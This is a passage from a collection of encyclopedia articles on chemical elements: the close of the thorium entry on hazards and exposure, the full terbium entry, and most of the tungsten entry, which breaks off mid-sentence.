isotopes produced in the thorium fuel cycle are mostly not transuranic, but some of them are still very dangerous, such as 231Pa, which has a half-life of 32,760 years and is a major contributor to the long-term radiotoxicity of spent nuclear fuel. Hazards and health effects Radiological Natural thorium decays very slowly compared to many other radioactive materials, and the emitted alpha radiation cannot penetrate human skin. As a result, handling small amounts of thorium, such as those in gas mantles, is considered safe, although the use of such items may pose some risks. Exposure to an aerosol of thorium, such as contaminated dust, can lead to increased risk of cancers of the lung, pancreas, and blood, as lungs and other internal organs can be penetrated by alpha radiation. Internal exposure to thorium leads to increased risk of liver diseases. The decay products of 232Th include more dangerous radionuclides such as radium and radon. Although relatively little of those products are created as the result of the slow decay of thorium, a proper assessment of the radiological toxicity of 232Th must include the contribution of its daughters, some of which are dangerous gamma emitters, and which are built up quickly following the initial decay of 232Th due to the absence of long-lived nuclides along the decay chain. As the dangerous daughters of thorium have much lower melting points than thorium dioxide, they are volatilised every time the mantle is heated for use. In the first hour of use large fractions of the thorium daughters 224Ra, 228Ra, 212Pb, and 212Bi are released. Most of the radiation dose by a normal user arises from inhaling the radium, resulting in a radiation dose of up to 0.2 millisieverts per use, about a third of the dose sustained during a mammogram. Some nuclear safety agencies make recommendations about the use of thorium mantles and have raised safety concerns regarding their manufacture and disposal; the radiation dose from one mantle is not a serious problem, but that from many mantles gathered together in factories or landfills is. Biological Thorium is odourless and tasteless. The chemical toxicity of thorium is low because thorium and its most common compounds (mostly the dioxide) are poorly soluble in water, precipitating out before entering the body as the hydroxide. Some thorium compounds are chemically moderately toxic, especially in the presence of strong complex-forming ions such as citrate that carry the thorium into the body in soluble form. If a thorium-containing object has been chewed or sucked, it loses 0.4% of thorium and 90% of its dangerous daughters to the body. Three-quarters of the thorium that has penetrated the body accumulates in the skeleton. Absorption through the skin is possible, but is not a likely means of exposure. Thorium's low solubility in water also means that excretion of thorium by the kidneys and faeces is rather slow. Tests on the thorium uptake of workers involved in monazite processing showed thorium levels above recommended limits in their bodies, but no adverse effects on health were found at those moderately low concentrations. No chemical toxicity has yet been observed in the tracheobronchial tract and the lungs from exposure to thorium. People who work with thorium compounds are at a risk of dermatitis. It can take as much as thirty years after the ingestion of thorium for symptoms to manifest themselves. Thorium has no known biological role. Chemical Powdered thorium metal is pyrophoric: it ignites spontaneously in air. In 1964, the United States Department of the Interior listed thorium as "severe" on a table entitled "Ignition and explosibility of metal powders". Its ignition temperature was given as 270 °C (520 °F) for dust clouds and 280 °C (535 °F) for layers. Its minimum explosive concentration was listed as 0.075 oz/cu ft (0.075 kg/m3); the minimum igniting energy for (non-submicron) dust was listed as 5 mJ. In 1956, the Sylvania Electric Products explosion occurred during reprocessing and burning of thorium sludge in New York City, United States. Nine people were injured; one died of complications caused by third-degree burns. Exposure routes Thorium exists in very small quantities everywhere on Earth although larger amounts exist in certain parts: the average human contains about 40 micrograms of thorium and typically consumes three micrograms per day. Most thorium exposure occurs through dust inhalation; some thorium comes with food and water, but because of its low solubility, this exposure is negligible. Exposure is raised for people who live near thorium deposits or radioactive waste disposal sites, those who live near or work in uranium, phosphate, or tin processing factories, and for those who work in gas mantle production. Thorium is especially common in the Tamil Nadu coastal areas of India, where residents may be exposed to a naturally occurring radiation dose ten times higher than the worldwide average. It is also common in northern Brazilian coastal areas, from south Bahia to Guarapari, a city with radioactive monazite sand beaches, with radiation levels up to 50 times higher than world average background radiation. Another possible source of exposure is thorium dust produced at weapons testing ranges, as thorium is used in the guidance systems of some missiles. This has been blamed for a high incidence of birth defects and cancer at Salto di Quirra on the Italian island of Sardinia.
Physical sciences
Chemical elements_2
null
30045
https://en.wikipedia.org/wiki/Terbium
Terbium
Terbium is a chemical element; it has the symbol Tb and atomic number 65. It is a silvery-white, rare earth metal that is malleable and ductile. The ninth member of the lanthanide series, terbium is a fairly electropositive metal that reacts with water, evolving hydrogen gas. Terbium is never found in nature as a free element, but it is contained in many minerals, including cerite, gadolinite, monazite, xenotime and euxenite. Swedish chemist Carl Gustaf Mosander discovered terbium as a chemical element in 1843. He detected it as an impurity in yttrium oxide (). Yttrium and terbium, as well as erbium and ytterbium, are named after the village of Ytterby in Sweden. Terbium was not isolated in pure form until the advent of ion exchange techniques. Terbium is used to dope calcium fluoride, calcium tungstate and strontium molybdate in solid-state devices, and as a crystal stabilizer of fuel cells that operate at elevated temperatures. As a component of Terfenol-D (an alloy that expands and contracts when exposed to magnetic fields more than any other alloy), terbium is of use in actuators, in naval sonar systems and in sensors. Terbium is considered non-hazardous, though its biological role and toxicity have not been researched in depth. Most of the world's terbium supply is used in green phosphors. Terbium oxide is used in fluorescent lamps and television and monitor cathode-ray tubes (CRTs). Terbium green phosphors are combined with divalent europium blue phosphors and trivalent europium red phosphors to provide trichromatic lighting technology, a high-efficiency white light used in indoor lighting. Characteristics Physical properties Terbium is a silvery-white rare earth metal that is malleable, ductile and soft enough to be cut with a knife. It is relatively stable in air compared to the more reactive lanthanides in the first half of the lanthanide series. Terbium exists in two crystal allotropes with a transformation temperature of 1289 °C between them. The 65 electrons of a terbium atom are arranged in the electron configuration [Xe]4f96s2. The eleven 4f and 6s electrons are valence. Only three electrons can be removed before the nuclear charge becomes too great to allow further ionization, but in the case of terbium, the stability of the half-filled [Xe]4f7 configuration allows further ionization of a fourth electron in the presence of very strong oxidizing agents such as fluorine gas. The terbium(III) cation (Tb3+) is brilliantly fluorescent, in a bright lemon-yellow color that is the result of a strong green emission line in combination with other lines in the orange and red. The yttrofluorite variety of the mineral fluorite owes its creamy-yellow fluorescence in part to terbium. Terbium easily oxidizes, and is therefore used in its elemental form specifically for research. Single terbium atoms have been isolated by implanting them into fullerene molecules. Trivalent europium (Eu3+) and Tb3+ ions are among the lanthanide ions that have garnered the most attention because of their strong luminosity and great color purity. Terbium has a simple ferromagnetic ordering at temperatures below 219 K. Above 219 K, it turns into a helical antiferromagnetic state in which all of the atomic moments in a particular basal plane layer are parallel and oriented at a fixed angle to the moments of adjacent layers. This antiferromagnetism transforms into a disordered paramagnetic state at 230 K. Chemical properties Terbium metal is an electropositive element and oxidizes in the presence of most acids (such as sulfuric acid), all of the halogens, and water. Terbium oxidizes readily in air to form a mixed terbium(III,IV) oxide: The most common oxidation state of terbium is +3 (trivalent), such as in . In the solid state, tetravalent terbium is also known, in compounds such as terbium oxide () and terbium tetrafluoride. In solution, terbium typically forms trivalent species, but can be oxidized to the tetravalent state with ozone in highly basic aqueous conditions. The coordination and organometallic chemistry of terbium is similar to other lanthanides. In aqueous conditions, terbium can be coordinated by nine water molecules, which are arranged in a tricapped trigonal prismatic molecular geometry. Complexes of terbium with lower coordination number are also known, typically with bulky ligands like bis(trimethylsilyl)amide, which forms the three-coordinate tris[N,N-bis(trimethylsilyl)amide]terbium(III) () complex. Most coordination and organometallic complexes contain terbium in the trivalent oxidation state. Divalent Tb2+ complexes are also known, usually with bulky cyclopentadienyl-type ligands. A few coordination compounds containing terbium in its tetravalent state are also known. Oxidation states Like most rare-earth elements and lanthanides, terbium is usually found in the +3 oxidation state. Like cerium and praseodymium, terbium can also form a +4 oxidation state, although it is unstable in water. It is possible for terbium to be found in the 0, +1, and +2 oxidation states. Compounds Terbium combines with nitrogen, carbon, sulfur, phosphorus, boron, selenium, silicon and arsenic at elevated temperatures, forming various binary compounds such as , , , , , and . In these compounds, terbium mainly exhibits the oxidation state +3, with the +2 state appearing rarely. Terbium(II) halides are obtained by annealing terbium(III) halides in presence of metallic terbium in tantalum containers. Terbium also forms the sesquichloride , which can be further reduced to terbium(I) chloride () by annealing at 800 °C; this compound forms platelets with layered graphite-like structure. Terbium(IV) fluoride () is the only halide that tetravalent terbium can form. It has strong oxidizing properties and is a strong fluorinating agent, emitting relatively pure atomic fluorine when heated, rather than the mixture of fluoride vapors emitted from cobalt(III) fluoride or cerium(IV) fluoride. It can be obtained by reacting terbium(III) chloride or terbium(III) fluoride with fluorine gas at 320 °C: 2 TbF3 + F2 → 2 TbF4 When and caesium fluoride (CsF) is mixed in a stoichiometric ratio in a fluorine gas atmosphere, caesium pentafluoroterbate () is obtained. It is an orthorhombic crystal with space group Cmca and a layered structure composed of [TbF8]4− and 11-coordinated Cs+. The compound barium hexafluoroterbate (), an orthorhombic crystal with space group Cmma, can be prepared in a similar method. The terbium fluoride ion [TbF8]4− also exists in the structure of potassium terbium fluoride crystals. Terbium(III) oxide or terbia is the main oxide of terbium, and appears as a dark brown water-insoluble solid. It is slightly hygroscopic and is the main terbium compound found in rare earth-containing minerals and clays. Other compounds include: Chlorides: Bromides: Iodides: Fluorides: , Isotopes Naturally occurring terbium is composed of its only stable isotope, terbium-159; the element is thus mononuclidic and monoisotopic. Thirty-nine radioisotopes have been characterized, with the heaviest being terbium-174 and lightest being terbium-135 (both with unknown exact mass). The most stable synthetic radioisotopes of terbium are terbium-158, with a half-life of 180 years, and terbium-157, with a half-life of 71 years. All of the remaining radioactive isotopes have half-lives that are less than three months, and the majority of these have half-lives that are less than half a minute. The primary decay mode before the most abundant stable isotope, Tb, is electron capture, which results in production of gadolinium isotopes, and the primary mode after is beta minus decay, resulting in dysprosium isotopes. The element also has 31 nuclear isomers, with masses of 141–154, 156, 158, 162, and 164–168 (not every mass number corresponds to only one isomer). The most stable of them are terbium-156m, with a half-life of 24.4 hours, and terbium-156m2, with a half-life of 22.7 hours; this is longer than half-lives of most ground states of radioactive terbium isotopes, except those with mass numbers 155–161. Terbium-149, with a half-life of 4.1 hours, is a promising candidate in targeted alpha therapy and positron emission tomography. History Swedish chemist Carl Gustaf Mosander discovered terbium in 1843. He detected it as an impurity in yttrium oxide, , then known as yttria. Yttrium, erbium, and terbium are all named after the village of Ytterby in Sweden. Terbium was not isolated in pure form until the advent of ion exchange techniques. Mosander first separated yttria into three fractions, all named for the ore: yttria, erbia, and terbia. "Terbia" was originally the fraction that contained the pink color, due to the element now known as erbium. "Erbia", the oxide containing what is now known as terbium, originally was the fraction that was yellow or dark orange in solution. The insoluble oxide of this element was noted to be tinged brown, and soluble oxides after combustion were noted to be colorless. Until the advent of spectral analysis, arguments went back and forth as to whether erbia even existed. Spectral analysis by Marc Delafontaine allowed the separate elements and their oxides to be identified, but in his publications, the names of erbium and terbium were switched, following a brief period where terbium was renamed "mosandrum", after Mosander. The names have remained switched ever since. The early years of preparing terbium (as terbium oxide) were difficult. Metal oxides from gadolinite and samarskite were dissolved in nitric acid, and the solution was further separated using oxalic acid and potassium sulfate. There was great difficulty in separating erbia from terbia; in 1881, it was noted that there was no satisfactory method to separate the two. By 1914, different solvents had been used to separate terbium from its host minerals, but the process of separating terbium from its neighbor elements - gadolinium and dysprosium - was described as "tedious" but possible. Modern terbium extraction methods are based on the liquid–liquid extraction process developed by Werner Fischer et al., in 1937. Occurrence Terbium occurs with other rare earth elements in many minerals, including monazite ( with up to 0.03% terbium), xenotime () and euxenite ( with 1% or more terbium). The crust abundance of terbium is estimated as 1.2 mg/kg. No terbium-dominant mineral has yet been found. Terbium (as the species Tb II) has been detected in the atmosphere of KELT-9b, a hot-Jupiter planet outside the Solar system. Currently, the richest commercial sources of terbium are the ion-adsorption clays of southern China; the concentrates with about two-thirds yttrium oxide by weight have about 1% terbia. Small amounts of terbium occur in bastnäsite and monazite; when these are processed by solvent extraction to recover the valuable heavy lanthanides as samarium-europium-gadolinium concentrate, terbium is recovered therein. Due to the large volumes of bastnäsite processed relative to the ion-adsorption clays, a significant proportion of the world's terbium supply comes from bastnäsite. In 2018, a rich terbium supply was discovered off the coast of Japan's Minamitori Island, with the stated supply being "enough to meet the global demand for 420 years". Production Crushed terbium-containing minerals are treated with hot concentrated sulfuric acid to produce water-soluble sulfates of rare earths. The acidic filtrates are partially neutralized with caustic soda to pH 3–4. Thorium precipitates out of solution as hydroxide and is removed. The solution is treated with ammonium oxalate to convert rare earths into their insoluble oxalates. The oxalates are decomposed to oxides by heating. The oxides are dissolved in nitric acid that excludes one of the main components, cerium, whose oxide is insoluble in . Terbium is separated as a double salt with ammonium nitrate by crystallization. The most efficient separation routine for terbium salt from the rare-earth salt solution is ion exchange. In this process, rare-earth ions are sorbed onto suitable ion-exchange resin by exchange with hydrogen, ammonium or cupric ions present in the resin. The rare earth ions are then selectively washed out by suitable complexing agents. As with other rare earths, terbium metal is produced by reducing the anhydrous chloride or fluoride with calcium metal. Calcium and tantalum impurities can be removed by vacuum remelting, distillation, amalgam formation or zone melting. In 2020, the annual demand for terbium was estimated at . Terbium is not distinguished from other rare earths in the United States Geological Survey's Mineral Commodity Summaries, which in 2024 estimated the global reserves of rare earth minerals at . Applications Terbium is used as a dopant in calcium fluoride, calcium tungstate, and strontium molybdate, materials that are used in solid-state devices, and as a crystal stabilizer of fuel cells which operate at elevated temperatures, together with zirconium dioxide (). Terbium is also used in alloys and in the production of electronic devices. As a component of Terfenol-D, terbium is used in actuators, in naval sonar systems, sensors, and other magnetomechanical devices. Terfenol-D is a terbium alloy that expands or contracts in the presence of a magnetic field. It has the highest magnetostriction of any alloy. It is used to increase verdet constant in long-distance fiber optic communication. Terbium-doped garnets are also used in optical isolators, which prevents reflected light from traveling back along the optical fiber. Terbium oxides are used in green phosphors in fluorescent lamps, color TV tubes, and flat screen monitors. Terbium, along with all other lanthanides except lanthanum and lutetium, is luminescent in the 3+ oxidation state. The brilliant fluorescence allows terbium to be used as a probe in biochemistry, where it somewhat resembles calcium in its behavior. Terbium "green" phosphors (which fluoresce a brilliant lemon-yellow) are combined with divalent europium blue phosphors and trivalent europium red phosphors to provide trichromatic lighting, which is by far the largest consumer of the world's terbium supply. Trichromatic lighting provides much higher light output for a given amount of electrical energy than does incandescent lighting. In 2023, terbium compounds were used to create a lattice with a single iron atom that was then examined by synchrotron x-ray beam. This was the first successful attempt to characterize a single atom at sub-atomic levels. Safety Terbium, along with many of the other rare earth elements, is poorly studied in terms of its toxicology and environmental impacts. Few health-based guidance values for safe exposure to terbium are available. No values are established in the United States by the Occupational Safety and Health Administration or American Conference of Governmental Industrial Hygienists at which terbium exposure becomes hazardous, and it is not considered a hazardous substance under the Globally Harmonized System of Classification and Labelling of Chemicals. Reviews of the toxicity of the rare earth elements place terbium and its compounds as "of low to moderately toxicity", remarking on the lack of detailed studies on their hazards and the lack of market demand forestalling evidence of toxicity. Some studies demonstrate environmental accumulation of terbium as hazardous to fish and plants. High exposures of terbium may enhance the toxicity of other substances causing endocytosis in plant cells.
Physical sciences
Chemical elements_2
null
30046
https://en.wikipedia.org/wiki/Tungsten
Tungsten
Tungsten (also called wolfram) is a chemical element; it has symbol W and atomic number 74. It is a rare metal found naturally on Earth almost exclusively as compounds with other elements. It was identified as a distinct element in 1781 and first isolated as a metal in 1783. Its important ores include scheelite and wolframite, the latter lending the element its alternative name. The free element is remarkable for its robustness, especially the fact that it has the highest melting point of all known elements, melting at . It also has the highest boiling point, at . Its density is 19.254 g/cm3, comparable with that of uranium and gold, and much higher (about 1.7 times) than that of lead. Polycrystalline tungsten is an intrinsically brittle and hard material (under standard conditions, when uncombined), making it difficult to work into metal. However, pure single-crystalline tungsten is more ductile and can be cut with a hard-steel hacksaw. Tungsten occurs in many alloys, which have numerous applications, including incandescent light bulb filaments, X-ray tubes, electrodes in gas tungsten arc welding, superalloys, and radiation shielding. Tungsten's hardness and high density make it suitable for military applications in penetrating projectiles. Tungsten compounds are often used as industrial catalysts. Its largest use is in tungsten carbide, a wear-resistant metal used in metalworking, mining, and construction. About 50% of tungsten is used in tungsten carbide, with the remaining major use being alloys and steels: less than 10% is used other compounds. Tungsten is the only metal in the third transition series that is known to occur in biomolecules, being found in a few species of bacteria and archaea. However, tungsten interferes with molybdenum and copper metabolism and is somewhat toxic to most forms of animal life. Characteristics Physical properties In its raw form, tungsten is a hard steel-grey metal that is often brittle and hard to work. Purified, monocrystalline tungsten retains its hardness (which exceeds that of many steels), and becomes malleable enough that it can be worked easily. It is worked by forging, drawing, or extruding but it is more commonly formed by sintering. Of all metals in pure form, tungsten has the highest melting point (), lowest vapor pressure (at temperatures above ), and the highest tensile strength. Although carbon remains solid at higher temperatures than tungsten, carbon sublimes at atmospheric pressure instead of melting, so it has no melting point. Moreover, tungsten's most stable crystal phase does not exhibit any high-pressure-induced structural transformations for pressures up to at least 364 gigapascals. Tungsten has the lowest coefficient of thermal expansion of any pure metal. The low thermal expansion and high melting point and tensile strength of tungsten originate from strong covalent bonds formed between tungsten atoms by the 5d electrons. Alloying small quantities of tungsten with steel greatly increases its toughness. Tungsten exists in two major crystalline forms: α and β. The former has a body-centered cubic structure and is the more stable form. The structure of the β phase is called A15 cubic; it is metastable, but can coexist with the α phase at ambient conditions owing to non-equilibrium synthesis or stabilization by impurities. Contrary to the α phase which crystallizes in isometric grains, the β form exhibits a columnar habit. The α phase has one third of the electrical resistivity and a much lower superconducting transition temperature TC relative to the β phase: ca. 0.015 K vs. 1–4 K; mixing the two phases allows obtaining intermediate TC values. The TC value can also be raised by alloying tungsten with another metal (e.g. 7.9 K for W-Tc). Such tungsten alloys are sometimes used in low-temperature superconducting circuits. Isotopes Naturally occurring tungsten consists of four stable isotopes (182W, 183W, 184W, and 186W) and one very long-lived radioisotope, 180W. Theoretically, all five can decay into isotopes of element 72 (hafnium) by alpha emission, but only 180W has been observed to do so, with a half-life of years; on average, this yields about two alpha decays of 180W per gram of natural tungsten per year. This rate is equivalent to a specific activity of roughly 63 micro-becquerel per kilogram. This rate of decay is orders of magnitude lower than that observed in carbon or potassium as found on earth, which likewise contain small amounts of long-lived radioactive isotopes. Bismuth was long thought to be non-radioactive, but (its longest lived isotope) actually decays with a half life of years or about a factor 10 slower than . However, due to naturally occurring bismuth being 100% , its specific activity is actually higher than that of natural tungsten at 3 milli-becquerel per kilogram. The other naturally occurring isotopes of tungsten have not been observed to decay, constraining their half-lives to be at least . Another 34 artificial radioisotopes of tungsten have been characterized, the most stable of which are 181W with a half-life of 121.2 days, 185W with a half-life of 75.1 days, 188W with a half-life of 69.4 days, 178W with a half-life of 21.6 days, and 187W with a half-life of 23.72 h. All of the remaining radioactive isotopes have half-lives of less than 3 hours, and most of these have half-lives below 8 minutes. Tungsten also has 12 meta states, with the most stable being 179mW (t1/2 6.4 minutes). Chemical properties Tungsten is a mostly non-reactive element: it does not react with water, is immune to attack by most acids and bases, and does not react with oxygen or air at room temperature. At elevated temperatures (i.e., when red-hot) it reacts with oxygen to form the trioxide compound tungsten(VI), WO3. It will, however, react directly with fluorine (F2) at room temperature to form tungsten(VI) fluoride (WF6), a colorless gas. At around 250 °C it will react with chlorine or bromine, and under certain hot conditions will react with iodine. Finely divided tungsten is pyrophoric. The most common formal oxidation state of tungsten is +6, but it exhibits all oxidation states from −2 to +6. Tungsten typically combines with oxygen to form the yellow tungstic oxide, WO3, which dissolves in aqueous alkaline solutions to form tungstate ions, . Tungsten carbides (W2C and WC) are produced by heating powdered tungsten with carbon. W2C is resistant to chemical attack, although it reacts strongly with chlorine to form tungsten hexachloride (WCl6). In aqueous solution, tungstate gives the heteropoly acids and polyoxometalate anions under neutral and acidic conditions. As tungstate is progressively treated with acid, it first yields the soluble, metastable "paratungstate A" anion, , which over time converts to the less soluble "paratungstate B" anion, . Further acidification produces the very soluble metatungstate anion, , after which equilibrium is reached. The metatungstate ion exists as a symmetric cluster of twelve tungsten-oxygen octahedra known as the Keggin anion. Many other polyoxometalate anions exist as metastable species. The inclusion of a different atom such as phosphorus in place of the two central hydrogens in metatungstate produces a wide variety of heteropoly acids, such as phosphotungstic acid H3PW12O40. Tungsten trioxide can form intercalation compounds with alkali metals. These are known as bronzes; an example is sodium tungsten bronze. In gaseous form, tungsten forms the diatomic species W2. These molecules feature a sextuple bond between tungsten atoms — the highest known bond order among stable atoms. History In 1781, Carl Wilhelm Scheele discovered that a new acid, tungstic acid, could be made from scheelite (at the time called tungsten). Scheele and Torbern Bergman suggested that it might be possible to obtain a new metal by reducing this acid. In 1783, José and Fausto Elhuyar found an acid made from wolframite that was identical to tungstic acid. Later that year, at the Royal Basque Society in the town of Bergara, Spain, the brothers succeeded in isolating tungsten by reduction of this acid with charcoal, and they are credited with the discovery of the element (they called it "wolfram" or "volfram"). The strategic value of tungsten came to notice in the early 20th century. British authorities acted in 1912 to free the Carrock mine from the German owned Cumbrian Mining Company and, during World War I, restrict German access elsewhere. In World War II, tungsten played a more significant role in background political dealings. Portugal, as the main European source of the element, was put under pressure from both sides, because of its deposits of wolframite ore at Panasqueira. Tungsten's desirable properties such as resistance to high temperatures, its hardness and density, and its strengthening of alloys made it an important raw material for the arms industry, both as a constituent of weapons and equipment and employed in production itself, e.g., in tungsten carbide cutting tools for machining steel. Now tungsten is used in many more applications such as aircraft and motorsport ballast weights, darts, anti-vibration tooling, and sporting equipment. Tungsten is unique amongst the elements in that it has been the subject of patent proceedings. In 1928, a US court rejected General Electric's attempt to patent it, overturning granted in 1913 to William D. Coolidge. It is suggested that remnants of wolfram have been found in what may have been the garden of the astronomer/alchemist Tycho Brahe Etymology The name tungsten (which means in Swedish and was the old Swedish name for the mineral scheelite and other minerals of similar density) is used in English, French, and many other languages as the name of the element, but wolfram (or volfram) is used in most European (especially Germanic and Slavic) languages and is derived from the mineral wolframite, which is the origin of the chemical symbol W. The name wolframite is derived from German (), the name given to tungsten by Johan Gottschalk Wallerius in 1747. This, in turn, derives from Latin , the name Georg Agricola used for the mineral in 1546, which translates into English as and is a reference to the large amounts of tin consumed by the mineral during its extraction, as though the mineral devoured it like a wolf. This naming follows a tradition of colorful names miners from the Ore Mountains would give various minerals, out of a superstition that certain ones that looked as if they contained then-known valuable metals but when extracted were somehow "hexed". Cobalt (cf. Kobold), pitchblende (cf. German for ) and nickel (cf. "Old Nick") derive their names from the same miners' idiom. Occurrence Tungsten has thus far not been found in nature in its pure form. Instead, tungsten is found mainly in the minerals wolframite and scheelite. Wolframite is iron–manganese tungstate , a solid solution of the two minerals ferberite (FeWO4) and hübnerite (MnWO4), while scheelite is calcium tungstate (CaWO4). Other tungsten minerals range in their level of abundance from moderate to very rare, and have almost no economic value. Chemical compounds Tungsten forms chemical compounds in oxidation states from -II to VI. Higher oxidation states, always as oxides, are relevant to its terrestrial occurrence and its biological roles, mid-level oxidation states are often associated with metal clusters, and very low oxidation states are typically associated with CO complexes. The chemistries of tungsten and molybdenum show strong similarities to each other, as well as contrasts with their lighter congener, chromium. The relative rarity of tungsten(III), for example, contrasts with the pervasiveness of the chromium(III) compounds. The highest oxidation state is seen in tungsten(VI) oxide (WO3). Tungsten(VI) oxide is soluble in aqueous base, forming tungstate (WO42−). This oxyanion condenses at lower pH values, forming polyoxotungstates. The broad range of oxidation states of tungsten is reflected in its various chlorides: Tungsten(II) chloride, which exists as the hexamer W6Cl12 Tungsten(III) chloride, which exists as the hexamer W6Cl18 Tungsten(IV) chloride, WCl4, a black solid, which adopts a polymeric structure. Tungsten(V) chloride WCl5, a black solid which adopts a dimeric structure. Tungsten(VI) chloride WCl6, which contrasts with the instability of MoCl6. Organotungsten compounds are numerous and also span a range of oxidation states. Notable examples include the trigonal prismatic and octahedral . Production Reserves The world's reserves of tungsten are 3,200,000 tonnes; they are mostly located in China (1,800,000 t), Canada (290,000 t), Russia (160,000 t), Vietnam (95,000 t) and Bolivia. As of 2017, China, Vietnam and Russia are the leading suppliers with 79,000, 7,200 and 3,100 tonnes, respectively. Canada had ceased production in late 2015 due to the closure of its sole tungsten mine. Meanwhile, Vietnam had significantly increased its output in the 2010s, owing to the major optimization of its domestic refining operations, and overtook Russia and Bolivia. China remains the world's leader not only in production, but also in export and consumption of tungsten products. Tungsten production is gradually increasing outside China because of the rising demand. Meanwhile, its supply by China is strictly regulated by the Chinese Government, which fights illegal mining and excessive pollution originating from mining and refining processes. There is a large deposit of tungsten ore on the edge of Dartmoor in the United Kingdom, which was exploited during World War I and World War II as the Hemerdon Mine. Following increases in tungsten prices, this mine was reactivated in 2014, but ceased activities in 2018. Within the EU, the Austrian Felbertal scheelite deposit is one of the few producing tungsten mines. Portugal is one of Europe's main tungsten producers, with 121 kt of contained tungsten in mineral concentrates from 1910 to 2020, accounting for roughly 3.3% of the global production. Tungsten is considered to be a conflict mineral due to the unethical mining practices observed in the Democratic Republic of the Congo. South Korea's Sangdong mine, one of the world's largest tungsten mines with 7,890,000 tonnes of high-grade tungsten reportedly buried, was closed in 1994 due to low profitability but has since re-registered mining rights and is scheduled to resume activities in 2024. Extraction Tungsten is extracted from its ores in several stages. The ore is eventually converted to tungsten(VI) oxide (WO3), which is heated with hydrogen or carbon to produce powdered tungsten. Because of tungsten's high melting point, it is not commercially feasible to cast tungsten ingots. Instead, powdered tungsten is mixed with small amounts of powdered nickel or other metals, and sintered. During the sintering process, the nickel diffuses into the tungsten, producing an alloy. Tungsten can also be extracted by hydrogen reduction of WF6: WF6 + 3 H2 → W + 6 HF or pyrolytic decomposition: WF6 → W + 3 F2 (ΔHr = +) Tungsten is not traded as a futures contract and cannot be tracked on exchanges like the London Metal Exchange. The tungsten industry often uses independent pricing references such as Argus Media or Metal Bulletin as a basis for contracts. The prices are usually quoted for tungsten concentrate or WO3. Applications Approximately half of the tungsten is consumed for the production of hard materials – namely tungsten carbide – with the remaining major use being in alloys and steels. Less than 10% is used in other chemical compounds. Because of the high ductile-brittle transition temperature of tungsten, its products are conventionally manufactured through powder metallurgy, spark plasma sintering, chemical vapor deposition, hot isostatic pressing, and thermoplastic routes. A more flexible manufacturing alternative is selective laser melting, which is a form of 3D printing and allows creating complex three-dimensional shapes. Industrial Tungsten is mainly used in the production of hard materials based on tungsten carbide (WC), one of the hardest carbides. WC is an efficient electrical conductor, but W2C is less so. WC is used to make wear-resistant abrasives, and "carbide" cutting tools such as knives, drills, circular saws, dies, milling and turning tools used by the metalworking, woodworking, mining, petroleum and construction industries. Carbide tooling is actually a ceramic/metal composite, where metallic cobalt acts as a binding (matrix) material to hold the WC particles in place. This type of industrial use accounts for about 60% of current tungsten consumption. The jewelry industry makes rings of sintered tungsten carbide, tungsten carbide/metal composites, and also metallic tungsten. WC/metal composite rings use nickel as the metal matrix in place of cobalt because it takes a higher luster when polished. Sometimes manufacturers or retailers refer to tungsten carbide as a metal, but it is a ceramic. Because of tungsten carbide's hardness, rings made of this material are extremely abrasion resistant, and will hold a burnished finish longer than rings made of metallic tungsten. Tungsten carbide rings are brittle, however, and may crack under a sharp blow. Alloys The hardness and heat resistance of tungsten can contribute to useful alloys. A good example is high-speed steel, which can contain as much as 18% tungsten. Tungsten's high melting point makes tungsten a good material for applications like rocket nozzles, for example in the UGM-27 Polaris submarine-launched ballistic missile. Tungsten alloys are used in a wide range of applications, including the aerospace and automotive industries and radiation shielding. Superalloys containing tungsten, such as Hastelloy and Stellite, are used in turbine blades and wear-resistant parts and coatings. Tungsten's heat resistance makes it useful in arc welding applications when combined with another highly-conductive metal such as silver or copper. The silver or copper provides the necessary conductivity and the tungsten allows the welding rod to withstand the high temperatures of the arc welding environment. Permanent magnets Quenched (martensitic) tungsten steel (approx. 5.5% to 7.0% W with 0.5% to 0.7% C) was used for making hard permanent magnets, due to its high remanence and coercivity, as noted by John Hopkinson (1849–1898) as early as 1886. The magnetic properties of a metal or an alloy are very sensitive to microstructure. For example, while the element tungsten is not ferromagnetic (but iron is), when it is present in steel in these proportions, it stabilizes the martensite phase, which has greater ferromagnetism than the ferrite (iron) phase due to its greater resistance to magnetic domain wall motion. Military Tungsten, usually alloyed with nickel, iron, or cobalt to form heavy alloys, is used in kinetic energy penetrators as an alternative to depleted uranium, in applications where uranium's radioactivity is problematic even in depleted form, or where uranium's additional pyrophoric properties are not desired (for example, in ordinary small arms bullets designed to penetrate body armor). Similarly, tungsten alloys have also been used in shells, grenades, and missiles, to create supersonic shrapnel. Germany used tungsten during World War II to produce shells for anti-tank gun designs using the Gerlich squeeze bore principle to achieve very high muzzle velocity and enhanced armor penetration from comparatively small caliber and light weight field artillery. The weapons were highly effective but a shortage of tungsten used in the shell core, caused in part by the Wolfram Crisis, limited their use. Tungsten has also been used in dense inert metal explosives, which use it as dense powder to reduce collateral damage while increasing the lethality of explosives within a small radius. Chemical applications Tungsten(IV) sulfide is a high temperature lubricant and is a component of catalysts for hydrodesulfurization. MoS2 is more commonly used for such applications. Tungsten oxides are used in ceramic glazes and calcium/magnesium tungstates are used widely in fluorescent lighting. Crystal tungstates are used as scintillation detectors in nuclear physics and nuclear medicine. Other salts that contain tungsten are used in the chemical and tanning industries. Tungsten oxide (WO3) is incorporated into selective catalytic reduction (SCR) catalysts found in coal-fired power plants. These catalysts convert nitrogen oxides (NOx) to nitrogen (N2) and water (H2O) using ammonia (NH3). The tungsten oxide helps with the physical strength of the catalyst and extends catalyst life. Tungsten containing catalysts are promising for epoxidation, oxidation, and hydrogenolysis reactions. Tungsten heteropoly acids are key component of multifunctional catalysts. Tungstates can be used as photocatalyst, while the tungsten sulfide as electrocatalyst. Niche uses Applications requiring its high density include weights, counterweights, ballast keels for yachts, tail ballast for commercial aircraft, rotor weights for civil and military helicopters, and as ballast in race cars for NASCAR and Formula One. Being slightly less than twice the density, tungsten is seen as an alternative (albeit more expensive) to lead fishing sinkers. Depleted uranium is also used for these purposes, due to similarly high density. Seventy-five-kg blocks of tungsten were used as "cruise balance mass devices" on the entry vehicle portion of the 2012 Mars Science Laboratory spacecraft. It is an ideal material to use as a dolly for riveting, where the mass necessary for good results can be achieved in a compact bar. High-density alloys of tungsten with nickel, copper or iron are used in high-quality darts (to allow for a smaller diameter and thus tighter groupings) or for artificial flies (tungsten beads allow the fly to sink rapidly). Tungsten is also used as a heavy bolt to lower the rate of fire of the SWD M11/9 sub-machine gun from 1300 RPM to 700 RPM. Some string instrument strings incorporates tungsten. Tungsten is used as an absorber on the electron telescope on the Cosmic Ray System of the two Voyager spacecraft. Gold substitution Its density, similar to that of gold, allows tungsten to be used in jewelry as an alternative to gold 